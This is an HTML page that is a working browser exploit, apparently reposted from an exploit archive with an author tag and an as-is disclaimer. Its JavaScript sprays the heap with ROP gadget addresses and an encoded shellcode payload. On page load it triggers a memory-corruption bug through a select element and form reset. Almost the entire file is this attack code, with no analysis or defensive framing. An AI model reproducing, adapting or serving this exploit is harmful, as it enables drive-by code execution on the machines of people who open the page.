<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" id="doctype1">
<html>
<head>
<script type="text/javascript">
function int_to_hex(dword)
{
var d=Number(dword).toString (16);
while(d.length<8) d='0'+d;
return unescape('%u'+d.substr(4,8)+'%u'+d.substr(0,4));
};
spraybase = 0x0a0a0024;
var shellcode = unescape("%u9090%u9090%ucbb5%u7852%u9090%u9090%u11eb%u"+"4a5a%uc933%u8166%uE3c1%u8007%u0a34%ue296%uebfa%ue805%uffea%uffff%u7ef6%u9696%u9696%u17cb%u857b%ud686%u1d96%u1b63%uc310%ud683%uc696%ud67e%u9692%u1b96%ud010%ud683%uc696%ua27e%u9692%u1b96%u3010%ud683%uc696%ube7e%u9692%u1b96%u5910%ud683%uc696%u8a7e%u9692%uc096%u97fc%u3b7e%u9694%uc096%u94fc%u337e%u9694%uc096%u95fc%u0b7e%u9694%uc096%u92fc%u037e%u9694%uc096%uac7e%u9697%ufc96%u6996%ue800%ud683%uf796%uc355%u7a1d%u5215%u1d6a%u9ed3%ud31f%ua56a%ucf56%uaf16%ue296%ud692%u7dd7%u5f61%u9254%uc396%u7a1d%ue369%u7e9e%u694f%u6969%ud397%u1d9e%u9ae3%ueb1d%u699e%u9ae3%u5e7e%u6969%u1d69%u155e%u9757%u3265%u545f%u969e%u1dc3%uc17a%ueb1d%u139e%ue269%u1dbe%u9ac3%u4413%ub7e2%u1dc0%u86e3%u501d%u13d8%u1d56%ue059%ubd9a%ud041%u921c%u1e87%ud797%ue3d8%u1d61%uc851%u5fc9%u9a54%ua596%uc956%u545f%u969a%u1dc3%u1d7a%u9ee3%u101b%u8100%u96d6%u69c6%u1c00%ud683%ufc96%uc6f3%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u6252%ue31d%uf69e%ucb1b%uc56a%ud6fc%uf2fc%u101d%u83db%u96d6%u69c6%u1000%ud683%uf796%u101d%u83db%u96d6%ud31f%u1d62%u9350%u8709%u96d6%ud3bd%u1562%u937e%ud31f%uf66e%u97fc%u081b%u8193%u96d6%u1dc5%udb10%ud683%uc696%uc37e%u6969%uf769%ufcf6%u1b92%u6ed3%u1dc6%udb10%ud683%u1596%u9756%u7ec6%u69a8%u6969%u1bf7%ue810%ud683%ufc96%uc692%u092e%ud687%u9596%u1550%u9556%u7ec6%u69b2%u6969%u545f%u9692%u96fc%u962e%u9696%u6996%u5f46%u9254%uc396%u7a1d%u5215%u1d7a%u9ee3%u92fe%u9697%ufc96%u69d6%u1400%ud683%u1f96%u6ad3%ufec6%u9792%u9696%u0069%u83ec%u96d6%u1bf6%u1a08%ud681%uc596%ue369%u7e6a%u6821%u6969%u69f7%u6ae3%u0069%u83c8%u96d6%u96fc%u96fc%ue369%u1b6a%ub908%ud683%uc596%u96fc%u0069%u8340%u96d6%u569d%u1399%u9662%u9696%u96fc%u96fc%u95fc%u96fc%u95fc%u95fc%ue369%u696a%uf000%ud683%u1f96%u6ed3%ueb15%u966e%u1299%u9644%u9696%u96fc%ue369%u696e%uf400%ud683%u1f96%u62d3%ueb17%uf662%u967c%u9996%u2110%u9696%u1796%u62eb%uc906%u9697%u1599%u963c%u9696%ue369%ufc62%u69d6%u1400%ud683%u1f96%u66d3%ud351%u967a%u9696%ufc96%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83f8%u96d6%u569d%ueae2%u1df6%u62db%ud31d%u1c66%u1686%ub254%u6416%u1e4a%ud686%ue3df%uf764%u96fc%u96fc%u96fc%ue369%u696e%u0000%ud683%u1596%u696e%uc4e2%u96fc%ud351%u967a%u9696%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83e4%u96d6%u569d%ua4e2%ue369%u696e%ufc00%ud683%ufe96%u9146%u9696%u0069%u8304%u96d6%ue369%u696a%u1c00%ud683%u1596%u966e%u71e2%u081b%u8134%u96d6%uc6c5%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u4652%ue31d%ufe9a%u9792%u9696%ud6fc%u0069%u8314%u96d6%ud31f%u1b6a%u6ed3%ufec6%u968f%u9694%u96fc%ueb15%u979e%u90e3%u101b%u8348%u96d6%ueb15%u949e%u90e3%u101b%u8361%u96d6%ueb15%u959e%u90e3%u101b%u8081%u96d6%ueb15%u929e%u90e3%u101b%u80a9%u96d6%ufec6%u9694%u1696%u0069%u8339%u96d6%ueb15%u979e%u90e2%ueb15%u949e%u93e3%u1e7f%u9696%u1596%u9eeb%ue395%u9db4%ue356%ufc88%u1b96%uc108%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81e4%u96d6%u69c5%ue000%ud683%u1596%u9eeb%ue392%u9dc0%ue356%ufec4%u96a9%u9699%u96fc%u96fc%u0069%u832d%u96d6%u569d%ua9e2%ub2fc%u081b%u819a%u96d6%uc6c5%u0069%u8329%u96d6%u569d%ubde2%ucb1b%uc546%u97fc%u69c6%u5500%ud683%ufc96%u1b96%ub308%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81a9%u96d6%u69c5%ue000%ud683%u5f96%u9e54%u9d96%ue256%u5f90%u9e54%u7d96%u15f2%u9eeb%ue397%u1b90%uce08%ud680%u1596%u9eeb%ue394%u1b90%u3a08%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u1596%u9eeb%ue397%u1b90%u0708%ud680%u1596%u9eeb%ue394%u1b90%u7208%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u5f96%u9e54%uf696%ue21d%ub2b2%u017e%u9696%ufe96%u473b%ud7a2%u7ec6%u96b7%u9696%u69c0%u1d46%ubd4e%u3a56%u5612%u6de3%u681d%u133b%ue256%uc69c%u7ec5%u9691%u9696%u7d3d%uf767%u9254%uf696%ufa1d%ub2b2%ud31d%u1daa%ubec2%u95ee%u1d43%u8edc%ucc1d%u95b6%u754b%udfdf%ua21d%u951d%ua563%uf669%u401d%u56a5%u4661%u94a4%u9e25%u7e47%u93e5%ub6a3%u2e15%u687b%ue35d%u1665%u96ac%u95e2%u7dd4%u6171%u1f46%ub292%uadf7%ub2ea%ue3be%u1d5c%ub2cc%u4b95%u1df0%udd9a%ucc1d%u958a%u1d4b%u1d92%u5395%u947d%u56bd%ud21f%u8ab2%u54f7%u969e%ua5f6%uf256%ud61d%u13a6%uee56%u1d9a%u9ad6%ue61d%u3b8a%ud61d%u7d9e%u1d9f%ua2d6%ud61b%u1dea%uaad6%ud21f%u8ab2%u55f7%ue2fe%ue6e2%ub9ac%u9bb9%uf4fe%ub8a1%uf8ff%uf8b9%ue5b9%uf3b8%uf3ee%ue396%uf3e5%ua5e4%u96a4%u2d94%uf3dd%u9696%u9696%uf3fd%uf8e4%ufaf3%ua4a5%u4896%ub3f9%u8d48%ueb17%u4979%u1fbb%u0b1a%uf4dc%uccfe%u4ef7%u05c2%ue1e1%ud9b7%ud3ba%u0bbe%ubc7f%u1745%u63e7%u55d6%u35c5%u2d15%u5542%u3bef%ua247%u89d7%u5fea%u2c69%u57a0%ud49c%u130b%uef13%ucf29%u3580%u8976%u9697%u9696%uf796%ue0f2%ue6f7%ua5ff%u96a4%uc00f%u5b8f%u9fad%u1e21%u9439%u128e%u3bfa%uddef%u68fc%ubaf7%u6960%u894c%uc391%u5288%u9696%u9696%ue4e3%ufbfa%uf8f9%u8f96%u5542%u9604%u9696%uc596%ud0d9%uc1c2%uc4d7%ucad3%ud7ca%uf8fe%uf7da%ucaf4%uc0ca%udaa5%ue2ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%ufed7%udaf8%uf4f7%ucaca%ua5c0%ua5b6%ua3a0%ud5b6%ufffa%ufff8%u96f5%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uded8%ub6d8%uf9d5%ue6e4%ue4f9%ue2f7%uf9ff%ucaf8%ud8ca%ue0f7%ue4f3%uf7c0%uf5f5%uf8ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uc5d3%ue5c2%uf0f9%ucae2%ud7ca%ucfda%uf5f7%ud196%uf9fa%uf7f4%ucafa%ua5c0%udfda%ud3c2%uedc9%ua5d7%ua6d7%ud3af%ua4d3%ua7bb%ua7d4%ubbd3%ua6a2%ua1a0%ud4bb%ua4a4%ubbd2%ua4a6%uafa0%ua2a7%ud4a0%ua6a7%ua6a6%uc9eb%udad7%u96da%ufad1%uf4f9%ufaf7%uc0ca%udaa5%uc2df%uc9d3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%ud7ed%ud7a5%uafa6%ud3d3%ubba4%ud4a7%ud3a7%ua2bb%ua0a6%ubba1%ua4d4%ud2a4%ua6bb%ua0a4%ua7af%ua0a2%ua7d4%ua6a6%ueba6%ud7c9%udada%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%u2e96%u9696%u9696%u9696%u067f%u0606%u0606%ud796%uda96%ucf96%uf796%uf596%uc996%uc696%ucc96%uc596%ue496%ue096%u9696%u9696%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%ucfd7%uf1d7%uf8f3%ub8e2%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%udad7%uf7cf%ub8f5%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%uc0d8%ud7d5%uf3f1%ue2f8%uf8b8%uf5e6%uf896%ue5e2%ub6f2%uf5bb%ue7b6%ubbb6%uf8e6%ud8b6%uf7e5%ue5e0%uf5e0%uf8b8%uf5e6%uc096%udac5%ueff7%uf2b8%ufafa%uc596%uf2fe%uf5f9%ue1e0%uf2b8%ufafa%uff96%ufff8%u96e2%uc5b2%uf3fe%ufafa%uf9d5%uf3f2%uc2c9%uf3fe%uf8d3%ub2f2%u3a2e%u9691%uc696%u967e%u9696%u6996%u96b3%ud6b6%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u96");
var heapspray =
int_to_hex(0x785863F6)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x7C7D1AD4)
+ int_to_hex(0x785863F6)
+ int_to_hex(0x78590ABC)
+ int_to_hex(spraybase)
+ int_to_hex(0x3000)
+ int_to_hex(0x40)
+ int_to_hex(spraybase)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x0a0a0220)
+ int_to_hex(0x78590ABC)
+ '11'
;
heapspray += int_to_hex(spraybase + 0x1F8 +4);
while (heapspray.length < 0x1F8/2)
{
heapspray += 'AA';
}
heapspray += int_to_hex(0x63f0575b); // virtual function 63f0575b
heapspray += shellcode;
function build_block(s)
{
var endtag = unescape("AA");
var len = 0x10000 - (s.length *2 + endtag.length * 2);
var b = "11";
while(b.length < len) b += b;
var block = b.substring(0, len / 2);
block = s + block + endtag;
var bigblock = "";
for (var i=0; i < 8; i++) bigblock += block;
bigblock = bigblock.substring(0, (0x80000-0x28)/2);
return bigblock
}
bigblock = build_block(heapspray);
var blocks = new Array();
for(var i = 0; i < 2 * 200; i++)
blocks[i] = [bigblock].join("");
function exploit()
{
var fakeobj = int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x63f01e13) +
int_to_hex(0x63F01100) +
int_to_hex(0x63f01ec4) +
int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u3b3b") +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
var formobj, selobj, optobj;
selobj = document.getElementById("select1");
formobj = selobj.form;
var loopcount = 2;
bigarray = new Array();
for (var i=0; i<loopcount; i++)
{
var imgarray = new Array();
for(var j = 0; j < 500; j++) {
imgarray.push(document.createElement("img"));
}
bigarray.push(imgarray);
}
for (var k=0; k<loopcount; k++)
{
for(var i=0;i<5;i++) {
optobj = document.createElement('option');
optobj.text = "test";
selobj.add(optobj);
}
selobj.innerText = "foo";
for(var i = 0; i < bigarray[k].length; i++) {
bigarray[k][i].title = fakeobj.substring(0, 0x38 / 2 - 1);
}
formobj.reset();
}
alert('s');
}
</script>
</head>
<body onload='exploit()'>
<form method="post">
<select id="select1">
</select>
</form>
<object classid="vvv.dll#GenericControl">
</body>
</html>
##eromang
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information